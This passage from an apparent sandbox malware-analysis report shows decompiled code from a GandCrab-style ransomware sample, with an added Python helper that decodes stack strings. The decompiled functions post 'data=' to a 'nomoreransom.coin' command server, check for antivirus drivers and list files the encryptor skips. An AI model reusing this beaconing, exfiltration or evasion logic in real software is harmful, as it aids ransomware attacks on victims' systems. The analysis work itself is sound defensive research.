                                        							_t49 = CreateThread(0, 0, E0F9D2D10, _t71, 0, 0);	// worker thread receives the HWND as its parameter
                                        							if(_t49 != 0) {
                                        								CloseHandle(_t49);
                                        							}
                                        							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
                                        								do {
                                        									TranslateMessage( &_v84);
                                        								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);	// loop ends once the window procedure E0F9D2C50 returns 0xdeadbeef
                                        							}
                                        							goto L15;
                                        						}
                                        						ExitThread(_t71);
                                        					}
                                        					ExitThread();
                                        				} else {
                                        					_v84.message = 0x730066;	// "fs"
                                        					_v84.wParam = 0x660064;	// "df"
                                        					_v84.lParam = 0x2e0077;	// "w."
                                        					_v84.time = 0x790073;	// "ys"
                                        					_v84.pt = 0x73;	// "s"  -> L"fsdfw.sys"
                                        					if(E0F9D2F50( &(_v84.message)) != 0) {	// a non-zero driver check for this name goes straight to ExitThread(0)
                                        						L15:
                                        						ExitThread(0);
                                        					}
                                        					_t61 = E0F9D30A0(_t62, _t67, _t69);
                                        					if(_t61 != 0) {
                                        						goto L15;
                                        					}
                                        					_push(_t61);
                                        					E0F9D2AD0();
                                        					goto L5;
                                        				}
                                        			}

                                        APIs
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F9D2E19
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0F9D2E2E
                                        • LoadIconW.USER32 ref: 0F9D2E59
                                        • RegisterClassExW.USER32 ref: 0F9D2E68
                                        • ExitThread.KERNEL32 ref: 0F9D2E75
                                          • Part of subcall function 0F9D2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E7B
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E81
                                        • CreateWindowExW.USER32 ref: 0F9D2EA7
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0F9D2EB4
                                        • ExitThread.KERNEL32 ref: 0F9D2EBF
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 0F9D2FA8
                                          • Part of subcall function 0F9D2F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 0F9D2FCF
                                          • Part of subcall function 0F9D2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F9D2FE3
                                          • Part of subcall function 0F9D2F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D2FFA
                                        • ExitThread.KERNEL32 ref: 0F9D2F3F
                                          • Part of subcall function 0F9D2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                          • Part of subcall function 0F9D2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                          • Part of subcall function 0F9D2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                          • Part of subcall function 0F9D2AD0: ExitThread.KERNEL32 ref: 0F9D2C47
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F9D2EC8
                                        • UpdateWindow.USER32(00000000), ref: 0F9D2ECF
                                        • CreateThread.KERNEL32 ref: 0F9D2EE3
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2EEE
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F05
                                        • TranslateMessage.USER32(?), ref: 0F9D2F1C
                                        • DispatchMessageW.USER32 ref: 0F9D2F23
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                        • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                        • API String ID: 3011903443-520298170
                                        • Opcode ID: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction ID: ed824f0ce8f8965badd5dc97d6c2dd60581aa0ff5608e7108fb867421c6f0b72
                                        • Opcode Fuzzy Hash: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction Fuzzy Hash: 9751817014D301AFF3209F61CC09B5B7BE8AF44B59F20891CF684AA1C2D7B9A559CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D7EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                        				long _v12;
                                        				void* _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				short _v68;
                                        				void* _t38;
                                        				void* _t40;
                                        				long _t54;
                                        				long _t59;
                                        				WCHAR* _t62;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        				void* _t67;
                                        
                                        				_t64 = __ecx;
                                        				_t38 =  *(__ecx + 4);
                                        				if(_t38 != 0) {
                                        					InternetCloseHandle(_t38);
                                        				}
                                        				E0F9D7CE0(_t64);
                                        				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0);	// port 80, INTERNET_SERVICE_HTTP, to the server name or address passed in _a4
                                        				_t65 = _t40;
                                        				_v12 = 0;
                                        				_v16 = _t65;
                                        				if(_t65 != 0) {
                                        					_t62 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);	// 10 KiB, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE (RWX for a plain string buffer)
                                        					_v20 = _t62;
                                        					wsprintfW(_t62, L"%s", _a8);	// request path
                                        					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);	// verb in _a36; flags include INTERNET_FLAG_RELOAD, NO_CACHE_WRITE, NO_AUTH, NO_UI, PRAGMA_NOCACHE and the IGNORE_CERT_* / IGNORE_REDIRECT_* bits
                                        					if(_t63 != 0) {
                                        						_v68 = 0x6f0048;	// "Ho"  stack string, two UTF-16 code units per DWORD
                                        						_v64 = 0x740073;	// "st"
                                        						_v60 = 0x20003a;	// ": "
                                        						_v56 = 0x6f006e;	// "no"
                                        						_v52 = 0x6f006d;	// "mo"
                                        						_v48 = 0x650072;	// "re"
                                        						_v44 = 0x610072;	// "ra"
                                        						_v40 = 0x73006e;	// "ns"
                                        						_v36 = 0x6d006f;	// "om"
                                        						_v32 = 0x63002e;	// ".c"
                                        						_v28 = 0x69006f;	// "oi"
                                        						_v24 = 0x6e;	// "n" + NUL  -> L"Host: nomoreransom.coin"
                                        						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {	// forced Host header (length -1 = NUL-terminated); .coin is an Emercoin blockchain TLD, so the TCP peer comes from _a4 while this header names the virtual host
                                        							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {	// extra headers _a40/_a44, optional body _a12/_a16
                                        								GetLastError();
                                        							} else {
                                        								_t67 = _a20;	// caller's receive buffer
                                        								_t59 = _a24 - 1;	// leave room for a terminating NUL
                                        								_a4 = 0;	// _a4 is reused as the bytes-read counter
                                        								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                        									while(1) {
                                        										_t54 = _a4;
                                        										if(_t54 == 0) {
                                        											goto L13;	// zero bytes read: end of response
                                        										}
                                        										 *((char*)(_t54 + _t67)) = 0;	// NUL-terminate; the buffer pointer never advances, so each read overwrites the previous chunk
                                        										_a4 = 0;
                                        										_v12 = 1;	// return value: at least one chunk was received
                                        										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                        											continue;
                                        										} else {
                                        										}
                                        										goto L13;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					L13:
                                        					InternetCloseHandle(_t63);
                                        					InternetCloseHandle(_v16);
                                        					VirtualFree(_v20, 0, 0x8000);
                                        					return _v12;
                                        				} else {
                                        					return _t40;
                                        				}
                                        			}
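Added example (not Joe Sandbox output and not code from the sample): both E0F9D2D30 and E0F9D7EF0 above build their strings on the stack from 32-bit immediates, two little-endian UTF-16 code units per DWORD store, so 0x6c006b is L"kl" and 0x6f0048 is L"Ho". The Python below recovers such strings from pasted decompiler lines. The store lines are copied from the two functions; the run-detection heuristic (printable ASCII halves form a string, a zero half ends it, lines that are not immediate stores do not break a run) is this example's own assumption and will miss strings with non-ASCII characters or mixed store widths.

```python
"""Decode UTF-16LE stack strings from IDA/Joe Sandbox decompiler listings.

Added example for this report; not Joe Sandbox code and not code from the
sample. The listing excerpts are copied from E0F9D2D30 and E0F9D7EF0.
The run-detection heuristic is this example's own assumption.
"""
import re
import struct
from typing import List

# A decompiler store of an integer immediate, e.g. "_v84.time = 0x730079;"
_IMM_RE = re.compile(r"=\s*(0x[0-9A-Fa-f]+|\d+)\s*;")


def decode_words(words: List[int], width: int = 4) -> str:
    """Decode a hand-listed sequence of immediates as one UTF-16LE string.

    width is the store size in bytes: 4 for a DWORD mov (two code units),
    2 for a WORD mov (one code unit). Decoding stops at the first NUL.
    """
    fmt = "<I" if width == 4 else "<H"
    raw = b"".join(struct.pack(fmt, w) for w in words)
    return raw.decode("utf-16-le").split("\x00", 1)[0]


def extract_stack_strings(listing: str, min_len: int = 3) -> List[str]:
    """Walk a decompiled listing and recover strings built from DWORD stores.

    Heuristic (assumption): consecutive immediate stores whose 16-bit halves
    are printable ASCII form one string; a zero half terminates it; any other
    value discards the run. Lines that are not immediate stores (pushes,
    calls) are skipped rather than breaking the run, because in E0F9D2D30 a
    _push() sits between the first two stores of "klif.sys".
    """
    found: List[str] = []
    current: List[str] = []

    def flush() -> None:
        if len(current) >= min_len:
            found.append("".join(current))
        current.clear()

    for line in listing.splitlines():
        m = _IMM_RE.search(line)
        if not m:
            continue
        text = m.group(1)
        word = int(text, 16) if text.lower().startswith("0x") else int(text, 10)
        for cu in (word & 0xFFFF, (word >> 16) & 0xFFFF):
            if cu == 0:                    # NUL code unit: end of string
                flush()
                break
            if not 0x20 <= cu <= 0x7E:     # not printable ASCII: not a string
                current.clear()
                break
            current.append(chr(cu))
    flush()
    return found


# Store lines copied from the decompiled E0F9D2D30 (both branches).
E0F9D2D30_STORES = """
_v84.message = 0x6c006b;
_push(_t67);
_v84.wParam = 0x660069;
_v84.lParam = 0x73002e;
_v84.time = 0x730079;
_v84.pt = 0;
_v96 = 0x6c006b;
_v92 = 0x2e0031;
_v88 = 0x790073;
_v84.hwnd = 0x73;
_v52.cbSize = 0x30;
_v52.style = 3;
_v84.message = 0x730066;
_v84.wParam = 0x660064;
_v84.lParam = 0x2e0077;
_v84.time = 0x790073;
_v84.pt = 0x73;
"""

# Store lines copied from the decompiled E0F9D7EF0.
E0F9D7EF0_STORES = """
_v12 = 0;
_v16 = _t65;
_v68 = 0x6f0048;
_v64 = 0x740073;
_v60 = 0x20003a;
_v56 = 0x6f006e;
_v52 = 0x6f006d;
_v48 = 0x650072;
_v44 = 0x610072;
_v40 = 0x73006e;
_v36 = 0x6d006f;
_v32 = 0x63002e;
_v28 = 0x69006f;
_v24 = 0x6e;
_a4 = 0;
_v12 = 1;
"""

if __name__ == "__main__":
    for name, stores in (("E0F9D2D30", E0F9D2D30_STORES), ("E0F9D7EF0", E0F9D7EF0_STORES)):
        print(name, extract_stack_strings(stores))
```

Run on the two excerpts it yields klif.sys, kl1.sys and fsdfw.sys for E0F9D2D30 and "Host: nomoreransom.coin" for E0F9D7EF0; the short WNDCLASSEXW constants (0x30, 3) are rejected by the length and printability checks.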

                                        APIs
                                        • InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                        • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F9D6EE6,ipv4bot.whatismyipaddress.com,0F9DFF10), ref: 0F9D7F4F
                                        • wsprintfW.USER32 ref: 0F9D7F63
                                        • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F9D7F81
                                        • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F9D7FEE
                                        • HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0F9D8005
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8024
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8050
                                        • GetLastError.KERNEL32 ref: 0F9D805C
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D8069
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D806E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D6EE6), ref: 0F9D807A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                        • String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
                                        • API String ID: 3906118045-3956618741
                                        • Opcode ID: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction ID: add1e3e8d9089d497ee8dcb87b67e8f7400d7a7f3856858366b6aa17cbdbd84f
                                        • Opcode Fuzzy Hash: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction Fuzzy Hash: 38418171600218BFEB208F55DC49FEE7FBDEF44B95F208019F904A62C2C7B599648BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E0F9D6790(WCHAR* __ecx) {
                                        				int _t4;
                                        				signed int _t5;
                                        				signed int _t15;
                                        				void* _t19;
                                        				WCHAR* _t21;
                                        				short* _t25;
                                        				WCHAR* _t26;
                                        
                                        				_t21 = __ecx;
                                        				_t4 = lstrlenW(__ecx);
                                        				_t5 = lstrlenW(_t21);
                                        				_t1 = _t21 - 2; // -2
                                        				_t25 = _t1 + _t5 * 2;	// last WCHAR of the path
                                        				_t19 = _t4 - 1;
                                        				if(_t19 != 0) {
                                        					do {	// scan backwards for the last L'\\' (0x5c)
                                        						_t25 = _t25 - 2;
                                        						_t19 = _t19 - 1;
                                        					} while ( *_t25 != 0x5c && _t19 != 0);
                                        				}
                                        				_t26 = _t25 + 2;	// file name after the separator; with no separator the scan stops on the first WCHAR, so _t26 is then the second one
                                        				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                        					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                        						goto L5;
                                        					} else {
                                        						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");	// the sample's own ransom note
                                        						asm("sbb eax, eax");
                                        						return  ~_t15 + 1;	// neg/sbb idiom: 1 when lstrcmpiW returned 0 (name matches), else 0; as for the fixed list above, 1 means leave the file alone
                                        					}
                                        				} else {
                                        					L5:
                                        					return 1;
                                        				}
                                        			}

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F9D69A3), ref: 0F9D679C
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D67A1
                                        • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F9D67CD
                                        • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F9D67E2
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F9D67EE
                                        • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F9D67FA
                                        • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F9D6806
                                        • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F9D6812
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F9D681E
                                        • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F9D682A
                                        • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0F9D6836
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$lstrlen
                                        • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                        • API String ID: 203586893-634406045
                                        • Opcode ID: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction ID: fb9f6914023d2799385fa6110f50e1366150e3d815b812e2cf7aedb1e735d2a3
                                        • Opcode Fuzzy Hash: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction Fuzzy Hash: 5F11E96220173E655A21367D9C42EEF119D8DC2BA4B758525F601F24C3DF85F61348F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0F9D54A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
                                        				CHAR* _v12;
                                        				void* _v16;
                                        				CHAR** _v20;
                                        				void* _v24;
                                        				void* _v28;
                                        				void* _v32;
                                        				char _v36;
                                        				short _v136;
                                        				char _v1156;
                                        				short _v1160;
                                        				int _t45;
                                        				void* _t53;
                                        				CHAR* _t57;
                                        				CHAR* _t59;
                                        				CHAR* _t60;
                                        				void* _t61;
                                        				void* _t70;
                                        				short _t71;
                                        
                                        				_t59 = __ecx;
                                        				_v20 = __edx;
                                        				_v12 = __ecx;
                                        				E0F9D7CE0( &_v36);
                                        				_v24 = E0F9D5060();
                                        				_t70 = 0x400 + lstrlenA(_t59) * 2;
                                        				_t7 = _t70 + 1; // 0x74cb6981
                                        				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                        				_v28 = _t60;
                                        				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                        				if(_t60 == 0) {
                                        					L2:
                                        					_t60 = 0;
                                        					L3:
                                        					lstrcatA(_t60, "data=");
                                        					lstrcatA(_t60, _v12);
                                        					asm("movdqu xmm0, [0xf9dfb20]");
                                        					asm("movdqu [ebp-0x84], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb30]");
                                        					asm("movdqu [ebp-0x74], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb40]");
                                        					asm("movdqu [ebp-0x64], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb50]");
                                        					asm("movdqu [ebp-0x54], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb60]");
                                        					asm("movdqu [ebp-0x44], xmm0");
                                        					asm("movdqu xmm0, [0xf9dfb70]");
                                        					asm("movdqu [ebp-0x34], xmm0");
                                        					lstrlenA(_t60);
                                        					_t71 = 0;
                                        					_v1160 = 0;
                                        					E0F9D9010( &_v1156, 0, 0x3fc);
                                        					lstrcpyW( &_v1160, L"curl.php?token=");
                                        					E0F9D53A0( &_v1160);
                                        					_t45 = lstrlenW( &_v136);
                                        					_t74 = _v16;
                                        					_push(_t45);
                                        					_push( &_v136);
                                        					_push(L"POST");
                                        					_push(0x31fff);
                                        					_push(_v16);
                                        					_push(lstrlenA(_t60));
                                        					_push(_t60);
                                        					_t61 = _v24;
                                        					_push( &_v1160);
                                        					_push(_t61);
                                        					if(E0F9D7EF0( &_v36) != 0) {
                                        						_t71 = 1;
                                        						if(_a4 != 0) {
                                        							_v12 = 0;
                                        							if(E0F9D5210(_t74,  &_v12) == 0) {
                                        								_t71 = 0;
                                        							} else {
                                        								_t57 = _v12;
                                        								if(_t57 != 0) {
                                        									 *_v20 = _t57;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					VirtualFree(_t61, 0, 0x8000);
                                        					VirtualFree(_v16, 0, 0x8000);
                                        					VirtualFree(_v28, 0, 0x8000);
                                        					_t53 = _v32;
                                        					if(_t53 != 0) {
                                        						InternetCloseHandle(_t53);
                                        					}
                                        					return _t71;
                                        				}
                                        				_t10 = _t70 + 1; // 0x74cb6981
                                        				if(_t70 < _t10) {
                                        					goto L3;
                                        				}
                                        				goto L2;
                                        			}
                                        0x0f9d54ab
                                        0x0f9d54ad
                                        0x0f9d54b4
                                        0x0f9d54b7
                                        0x0f9d54c2
                                        0x0f9d54d8
                                        0x0f9d54df
                                        0x0f9d54f3
                                        0x0f9d54f7
                                        0x0f9d54fc
                                        0x0f9d5501
                                        0x0f9d550a
                                        0x0f9d550a
                                        0x0f9d550c
                                        0x0f9d5518
                                        0x0f9d551e
                                        0x0f9d5520
                                        0x0f9d5529
                                        0x0f9d5531
                                        0x0f9d5539
                                        0x0f9d553e
                                        0x0f9d5546
                                        0x0f9d554b
                                        0x0f9d5553
                                        0x0f9d5558
                                        0x0f9d5560
                                        0x0f9d5565
                                        0x0f9d556d
                                        0x0f9d5572
                                        0x0f9d5578
                                        0x0f9d5587
                                        0x0f9d558d
                                        0x0f9d55a1
                                        0x0f9d55ad
                                        0x0f9d55b9
                                        0x0f9d55bf
                                        0x0f9d55c2
                                        0x0f9d55c9
                                        0x0f9d55ca
                                        0x0f9d55d2
                                        0x0f9d55d7
                                        0x0f9d55df
                                        0x0f9d55e0
                                        0x0f9d55e1
                                        0x0f9d55ea
                                        0x0f9d55eb
                                        0x0f9d55f6
                                        0x0f9d55fc
                                        0x0f9d5601
                                        0x0f9d5606
                                        0x0f9d5616
                                        0x0f9d5626
                                        0x0f9d5618
                                        0x0f9d5618
                                        0x0f9d561d
                                        0x0f9d5622
                                        0x0f9d5622
                                        0x0f9d561d
                                        0x0f9d5616
                                        0x0f9d5601
                                        0x0f9d5636
                                        0x0f9d5642
                                        0x0f9d564e
                                        0x0f9d5650
                                        0x0f9d5655
                                        0x0f9d5658
                                        0x0f9d5658
                                        0x0f9d5666
                                        0x0f9d5666
                                        0x0f9d5503
                                        0x0f9d5508
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                          • Part of subcall function 0F9D5060: Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                          • Part of subcall function 0F9D5060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                          • Part of subcall function 0F9D5060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                          • Part of subcall function 0F9D5060: wsprintfW.USER32 ref: 0F9D5166
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 0F9D54C5
                                        • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 0F9D54E5
                                        • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F9D54FA
                                        • lstrcatA.KERNEL32(00000000,data=), ref: 0F9D5518
                                        • lstrcatA.KERNEL32(00000000,0F9D582E), ref: 0F9D551E
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5572
                                        • _memset.LIBCMT ref: 0F9D558D
                                        • lstrcpyW.KERNEL32 ref: 0F9D55A1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D55B9
                                        • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0F9D55D9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0F9D5636
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D5642
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D564E
                                        • InternetCloseHandle.WININET(?), ref: 0F9D5658
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                        • String ID: POST$curl.php?token=$data=
                                        • API String ID: 186108914-1715678351
                                        • Opcode ID: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction ID: d06921e8be3cc22626783e33e12396159bc72395faba6ac99d49abac49619247
                                        • Opcode Fuzzy Hash: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction Fuzzy Hash: 9751F871D0130AABEB109BA4DC41FEEBB7CFF88301F648515FA44B2182DB786654CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E0F9D2AD0() {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				short _v20;
                                        				WCHAR* _v24;
                                        				WCHAR* _v28;
                                        				long _v32;
                                        				intOrPtr _v36;
                                        				WCHAR* _t24;
                                        				void* _t27;
                                        				WCHAR* _t33;
                                        				WCHAR* _t38;
                                        				signed int _t40;
                                        				signed int _t46;
                                        				WCHAR* _t50;
                                        				WCHAR* _t54;
                                        				void* _t56;
                                        				WCHAR* _t57;
                                        				void* _t58;
                                        				WCHAR* _t64;
                                        				WCHAR* _t65;
                                        				WCHAR* _t67;
                                        				signed int _t69;
                                        				void* _t71;
                                        				void* _t72;
                                        
                                        				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                        				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
                                        				_v24 = _t24;
                                        				_t64 = _t24;
                                        				_v32 = 0;
                                        				if(_t24 == 0) {
